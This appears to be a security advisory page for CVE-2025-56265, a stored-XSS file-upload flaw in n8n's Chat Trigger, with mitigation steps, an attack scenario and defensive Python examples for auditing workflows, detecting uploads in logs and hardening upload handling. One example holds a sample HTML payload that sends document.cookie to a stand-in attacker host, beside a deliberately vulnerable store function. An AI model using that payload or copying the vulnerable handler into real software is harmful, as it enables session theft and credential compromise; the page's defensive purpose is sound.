CVE-2025-56265: n8n: unrestricted file upload RCE via Chat Trigger
Severity: HIGH. PoC available. CISA SSVC: Attend.
n8n's Chat Trigger accepts unrestricted file uploads, letting a low-privileged attacker store a crafted HTML file whose JavaScript runs in an administrator's browser (stored XSS, per the public PoC). Organizations using n8n for AI agent orchestration face full workflow compromise, including exposure of API keys for OpenAI, Anthropic, and any other connected service held in the credential vault. Patch as soon as a fixed release exists; until then, disable Chat Trigger nodes in all exposed workflows and rotate all stored credentials.
What is the risk?
High risk. CVSS 8.8 (network vector, low complexity, low privileges) plus a public PoC puts this within reach of unskilled attackers. Two caveats a responder should weigh: PR:L means the attacker still needs some low-privilege access, typically a session on the exposed chat endpoint, and although the vector records UI:N, the PoC's stored-XSS chain only pays off when an administrator opens the stored file from the n8n UI. Exposure, not just version, therefore decides how urgent this is. The Chat Trigger is built to be internet-facing (it is a chatbot endpoint), which broadens the attack surface compared to internal-only components. n8n instances routinely hold credentials for LLM APIs, databases, cloud services, and communication platforms, making them high-value targets. Any organization running an unpatched n8n as part of an AI pipeline should treat this as an active incident.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | 1.95.3, 1.100.1, 1.101.1 (versions named in the advisory; other releases not cleared) | No patch listed |
Running one of those n8n versions with a Chat Trigger node? You're affected. Other versions have not been cleared by the advisory, so treat them as suspect until a fix is published.
What should I do?
6 steps:
1. PATCH: Upgrade n8n beyond the affected versions (1.95.3, 1.100.1, 1.101.1) as soon as a fixed release is available; no fix is listed on this page, so monitor github.com/n8n-io/n8n releases.
2. WORKAROUND: Disable Chat Trigger nodes in all workflows immediately; replace them with authenticated webhook triggers if chat functionality is business-critical.
3. AUDIT: Inventory all n8n instances across the organization; identify which have Chat Trigger nodes, whether the chat is public, and whether file uploads are enabled on it, and which are internet-exposed.
4. ROTATE CREDENTIALS: If exploitation cannot be ruled out, treat all credentials stored in n8n as compromised; rotate LLM API keys, DB passwords, OAuth tokens, and webhook secrets.
5. DETECT: Review n8n server and reverse-proxy logs for unexpected file uploads to Chat Trigger endpoints; monitor for anomalous outbound connections from n8n hosts.
6. NETWORK CONTROLS: Place all n8n instances behind a VPN or authenticating proxy; never expose Chat Trigger directly to the public internet without additional access controls.
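The AUDIT and WORKAROUND steps above can be scripted against exported workflow JSON. The following is an added example, not n8n project code; it assumes (verify against your n8n version) that Chat Trigger nodes carry the type identifier `@n8n/n8n-nodes-langchain.chatTrigger`, that `parameters.public` marks a hosted chat reachable without an n8n login, that `parameters.options.allowFileUploads` enables attachments, and that n8n honours a per-node `disabled` flag. The workflow export below is constructed for the example.

```python
"""Audit exported n8n workflows for Chat Trigger nodes and apply the interim workaround.

Added example, not n8n's own code. Assumptions (verify against your n8n version):
  - Chat Trigger nodes have type "@n8n/n8n-nodes-langchain.chatTrigger"
  - parameters.public == True means the hosted chat is reachable without an n8n login
  - parameters.options.allowFileUploads == True enables attachments in the chat UI
  - a per-node "disabled": true flag stops the node from running
The export below is constructed to look like an n8n workflow export; it is not a real instance.
"""
import copy
import json

CHAT_TRIGGER_TYPE = "@n8n/n8n-nodes-langchain.chatTrigger"  # assumed node type identifier

SAMPLE_EXPORT = json.dumps([
    {
        "id": "wf1", "name": "Support bot", "active": True,
        "nodes": [
            {"name": "When chat message received", "type": CHAT_TRIGGER_TYPE,
             "parameters": {"public": True, "options": {"allowFileUploads": True}}},
            {"name": "AI Agent", "type": "@n8n/n8n-nodes-langchain.agent", "parameters": {}},
        ],
    },
    {
        "id": "wf2", "name": "Internal triage", "active": True,
        "nodes": [
            {"name": "Chat", "type": CHAT_TRIGGER_TYPE,
             "parameters": {"public": False, "options": {}}},
        ],
    },
    {
        "id": "wf3", "name": "Nightly sync", "active": False,
        "nodes": [{"name": "Cron", "type": "n8n-nodes-base.scheduleTrigger", "parameters": {}}],
    },
])


def load_sample():
    """Parse the constructed export (in practice: the JSON you exported from n8n)."""
    return json.loads(SAMPLE_EXPORT)


def find_chat_triggers(workflows):
    """Return one finding per Chat Trigger node with the facts the AUDIT step asks for."""
    findings = []
    for wf in workflows:
        for node in wf.get("nodes", []):
            if node.get("type") != CHAT_TRIGGER_TYPE:
                continue
            params = node.get("parameters", {})
            public = bool(params.get("public", False))
            uploads = bool(params.get("options", {}).get("allowFileUploads", False))
            findings.append({
                "workflow": wf.get("name"),
                "node": node.get("name"),
                "active": bool(wf.get("active", False)),
                "public": public,
                "file_uploads": uploads,
                # Highest priority: a live, login-free chat endpoint that accepts attachments.
                "priority": "high" if (wf.get("active") and public and uploads) else "review",
            })
    return findings


def apply_workaround(workflows):
    """Return a copy with every Chat Trigger node disabled and uploads switched off.

    Turning allowFileUploads off as well is belt-and-braces in case someone
    re-enables the node by hand before a fixed release is deployed.
    """
    hardened = copy.deepcopy(workflows)
    for wf in hardened:
        for node in wf.get("nodes", []):
            if node.get("type") == CHAT_TRIGGER_TYPE:
                node["disabled"] = True
                node.setdefault("parameters", {}).setdefault("options", {})["allowFileUploads"] = False
    return hardened


if __name__ == "__main__":
    wfs = load_sample()
    for finding in find_chat_triggers(wfs):
        print(finding)
    print(json.dumps(apply_workaround(wfs), indent=1))
```

Run it against the JSON from each instance's workflow export (or the response of the public REST API's workflow listing, if you have an API key) and import the hardened copy back only after checking it in the UI; the "high" priority rows are the ones to take offline first.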
What does CISA's SSVC say?
Decision: Attend. Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-56265?
An arbitrary file upload weakness (CWE-434) in the Chat Trigger component of n8n 1.95.3, 1.100.1 and 1.101.1. The public PoC describes it as stored XSS: a crafted HTML file is uploaded through the chat endpoint and later executes in the browser of whoever opens it from the n8n UI, giving an attacker a path to an administrator's session and to every credential in the vault. See the summary at the top of this page.
Is CVE-2025-56265 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-56265, increasing the risk of exploitation. This page records a CISA SSVC decision of Attend and an EPSS score of 0.56%; it does not record confirmed in-the-wild exploitation.
How to fix CVE-2025-56265?
Follow the six steps under "What should I do?" above: patch when a fixed release ships (none is listed here), disable Chat Trigger nodes in the meantime, inventory instances and their exposure, rotate every credential n8n holds if exploitation cannot be ruled out, hunt for unexpected uploads to Chat Trigger endpoints, and keep n8n behind a VPN or authenticating proxy.
What systems are affected by CVE-2025-56265?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI chatbots, RAG pipelines, workflow automation, API integrations.
What is the CVSS score for CVE-2025-56265?
CVE-2025-56265 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.56%.
What is the AI security impact?
Affected AI Architectures: agent frameworks, AI chatbots, RAG pipelines, workflow automation, API integrations.
MITRE ATLAS Techniques:
- AML.T0049 Exploit Public-Facing Application
- AML.T0053 AI Agent Tool Invocation
- AML.T0080 AI Agent Context Poisoning
- AML.T0081 Modify AI Agent Configuration
- AML.T0083 Credentials from AI Agent Configuration
What are the technical details?
Original Advisory
An arbitrary file upload vulnerability in the Chat Trigger component of N8N v1.95.3, v1.100.1, and v1.101.1 allows attackers to execute arbitrary code via uploading a crafted HTML file.
Exploitation Scenario
An attacker finds an internet-facing n8n instance with a public Chat Trigger endpoint, searchable via Shodan or similar. Using the chat interface with only the low-privilege access the CVSS vector records (PR:L), the attacker uploads a crafted HTML file containing JavaScript. When an n8n administrator later opens the stored file while reviewing the chat session or interaction logs, the stored XSS fires in the admin's browser within the n8n origin. The script can exfiltrate session cookies to an attacker-controlled server or, if the session cookie is HttpOnly, simply call the n8n REST API from the admin's browser using the admin's session. Either way the attacker acts as admin, opens the credential manager, and harvests all stored API keys: OpenAI, Anthropic, Pinecone, Slack, database URIs. They then modify an existing AI agent workflow to silently forward all user queries and LLM responses to an external endpoint, effectively wiretapping the organization's AI pipeline without any further access.
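The first link in that chain, attachments posted to a Chat Trigger, is visible in the reverse-proxy access log even when n8n's own logging is sparse. The following detection is an added example, not n8n tooling. It assumes n8n sits behind nginx with a custom log_format of `$remote_addr - [$time_local] "$request" $status $body_bytes_sent "$content_type"` (nginx's `$content_type` variable is the request Content-Type header), and that hosted-chat Chat Trigger webhooks live under `/webhook/<id>/chat` (or `/webhook-test/` while testing); both are assumptions to verify in your deployment. The log lines are constructed for the example.

```python
"""Hunt for attachments sent to n8n Chat Trigger endpoints in proxy access logs.

Added example, not n8n's own tooling. Assumptions (verify in your deployment):
  - nginx log_format: '$remote_addr - [$time_local] "$request" $status $body_bytes_sent "$content_type"'
  - hosted-chat Chat Trigger routes look like /webhook/<id>/chat or /webhook-test/<id>/chat
  - chat attachments arrive as multipart/form-data POSTs
The log lines below are constructed; 203.0.113.0/24 etc. are documentation ranges.
"""
import re
from collections import Counter

SAMPLE_LOG = """\
203.0.113.7 - [02/Jul/2025:10:01:12 +0000] "POST /webhook/2f6c1b1e-aaaa-4c3d-9e2a-1234567890ab/chat HTTP/1.1" 200 512 "application/json"
203.0.113.7 - [02/Jul/2025:10:01:40 +0000] "POST /webhook/2f6c1b1e-aaaa-4c3d-9e2a-1234567890ab/chat HTTP/1.1" 200 640 "multipart/form-data; boundary=----x1"
198.51.100.23 - [02/Jul/2025:10:02:05 +0000] "GET /webhook/2f6c1b1e-aaaa-4c3d-9e2a-1234567890ab/chat HTTP/1.1" 200 2048 "-"
203.0.113.7 - [02/Jul/2025:10:02:30 +0000] "POST /webhook/2f6c1b1e-aaaa-4c3d-9e2a-1234567890ab/chat HTTP/1.1" 200 701 "multipart/form-data; boundary=----x2"
192.0.2.9 - [02/Jul/2025:10:03:00 +0000] "POST /webhook/9b1d0d5a-bbbb-4b1a-8c10-abcdef012345/upload HTTP/1.1" 200 300 "multipart/form-data; boundary=----y"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) - \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<ctype>[^"]*)"$'
)
CHAT_PATH_RE = re.compile(r"^/webhook(?:-test)?/[^/]+/chat$")  # assumed Chat Trigger route shape


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_chat_uploads(log_text):
    """Return the parsed records that look like attachments sent to a Chat Trigger."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["method"] == "POST"
                and CHAT_PATH_RE.match(rec["path"])
                and rec["ctype"].lower().startswith("multipart/form-data")):
            hits.append(rec)
    return hits


def uploads_by_source(log_text):
    """Count suspicious uploads per client IP so an admin knows which sessions to review first."""
    return Counter(rec["ip"] for rec in find_chat_uploads(log_text))


if __name__ == "__main__":
    for rec in find_chat_uploads(SAMPLE_LOG):
        print(rec["ts"], rec["ip"], rec["path"], rec["ctype"])
    print(uploads_by_source(SAMPLE_LOG))
```

Every hit is worth a look on a workflow whose Chat Trigger has file uploads disabled, since no legitimate client should be sending multipart bodies there; on workflows that do accept attachments, review the stored files from the filesystem or a text viewer, never by opening them from the n8n UI, since that is exactly the step that fires the payload.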
Weaknesses (CWE)
CWE-434 — Unrestricted Upload of File with Dangerous Type: The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.
- [Architecture and Design] Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423]
- [Architecture and Design] When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Source: MITRE CWE corpus.
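The two CWE-434 mitigations quoted above, plus the response headers that keep a browser from rendering an attachment, are what separates a harmless chat upload from the stored XSS described on this page. The following is an added example written for this page, not n8n's code and not the patch: `store_vulnerable` models the behaviour the advisory describes (client-chosen filename and content type are trusted, so an uploaded `.html` is later served from the application origin), and `store_hardened` applies an allow-list, a magic-byte check, a server-generated name, and download-only headers. The `ALLOWED` table, the size limit, and both uploads are constructed for the example.

```python
"""Vulnerable vs. hardened handling of a chat attachment (CWE-434 as exploited here).

Added example, not n8n's code or fix. Models the flaw the advisory describes and the
CWE-434 mitigations quoted on this page. ALLOWED, MAX_BYTES and the uploads are constructed.
"""
import os
import secrets

# Attacker-controlled upload: name, claimed type and bytes all come from the client.
HOSTILE_UPLOAD = {
    "filename": "invoice.html",
    "content_type": "text/html",
    "data": b"<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>",
}
BENIGN_UPLOAD = {
    "filename": "receipt.png",
    "content_type": "image/png",
    "data": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}

# Allow-list by extension, with the magic bytes the payload must start with (constructed).
ALLOWED = {
    ".png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    ".jpg": ("image/jpeg", b"\xff\xd8\xff"),
    ".pdf": ("application/pdf", b"%PDF-"),
}
MAX_BYTES = 5 * 1024 * 1024


def store_vulnerable(upload, store):
    """Before: keyed by the user's filename, served back with the user-supplied content type.

    An HTML upload is stored as text/html and rendered in the admin's browser: stored XSS.
    """
    store[upload["filename"]] = upload
    return {"Content-Type": upload["content_type"]}


def store_hardened(upload, store):
    """After: allow-list + magic-byte check, server-generated name, download-only headers."""
    ext = os.path.splitext(upload["filename"].lower())[1]
    if ext not in ALLOWED:
        raise ValueError(f"file type not allowed: {ext or '(none)'}")
    mime, magic = ALLOWED[ext]
    if len(upload["data"]) > MAX_BYTES or not upload["data"].startswith(magic):
        raise ValueError("content does not match the declared type")
    key = secrets.token_urlsafe(16) + ext  # no external input reaches the stored name
    store[key] = {"data": upload["data"], "content_type": mime}
    headers = {
        "Content-Type": mime,                                     # server's type, never the client's
        "Content-Disposition": f'attachment; filename="{key}"',  # download, never render inline
        "X-Content-Type-Options": "nosniff",                      # no sniffing back to text/html
        "Content-Security-Policy": "sandbox",                     # no script even if rendered
    }
    return key, headers


if __name__ == "__main__":
    vuln_store, safe_store = {}, {}
    print("vulnerable served with", store_vulnerable(HOSTILE_UPLOAD, vuln_store))
    try:
        store_hardened(HOSTILE_UPLOAD, safe_store)
    except ValueError as err:
        print("hardened rejected:", err)
    key, hdrs = store_hardened(BENIGN_UPLOAD, safe_store)
    print("hardened stored", key, hdrs)
```

The magic-byte check matters as much as the extension allow-list: a file named `evil.png` whose bytes are HTML is exactly the polyglot a browser will happily sniff as text/html when `nosniff` is missing, so the hardened path rejects it even though its extension is allowed.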
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References
- github.com/nikolas-ch/CVEs/blob/main/N8N/N8N_v1.100.1/ChatTrigger_StoredXSSviaUnrestrictedFileUpload/StoredXSSviaUnristrictedFileUpload.txt (3rd party)
- github.com/nikolas-ch/CVEs/tree/main/N8N/N8N_v1.100.1 (exploit)
- github.com/nikolas-ch/CVEs/tree/main/N8N/N8N_v1.100.1/ChatTrigger_StoredXSSviaUnrestrictedFileUpload (exploit)
- github.com/fkie-cad/nvd-json-data-feeds (exploit)
Related Vulnerabilities
- CVE-2026-33663 (10.0) n8n: member role steals plaintext HTTP credentials (same package: n8n)
- CVE-2026-33660 (10.0) TensorFlow: type confusion NPD in tensor conversion
- CVE-2026-21858 (10.0) n8n: Input Validation flaw enables exploitation (same package: n8n)
- CVE-2026-27577 (9.9) n8n: Code Injection enables RCE (same package: n8n)
- CVE-2026-27494 (9.9) n8n: security flaw enables exploitation (same package: n8n)